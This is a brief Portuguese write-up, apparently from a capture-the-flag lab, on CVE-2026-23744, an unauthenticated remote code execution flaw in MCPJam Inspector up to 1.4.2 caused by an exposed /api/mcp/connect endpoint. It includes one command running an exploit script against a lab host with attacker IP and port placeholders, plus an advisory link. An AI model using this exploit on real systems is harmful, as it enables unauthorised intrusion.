
Execução Remota de Código no MCPJam Inspector <= 1.4.2
CVE-2026-23744 é uma vulnerabilidade crítica no MCPJam Inspector (versões <= 1.4.2) que permite Execução Remota de Código (RCE) não autenticada. A falha existe porque o servidor de API interno da aplicação vincula-se a todas as interfaces de rede (0.0.0.0) por padrão e não possui autorização no endpoint /api/mcp/connect. Um atacante pode enviar um payload JSON malicioso para este endpoint a fim de executar comandos arbitrários com os privilégios do usuário que executa o Inspector.

python3 exploit.py https://mpc.kobold.htb <IP> <PORT>
https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6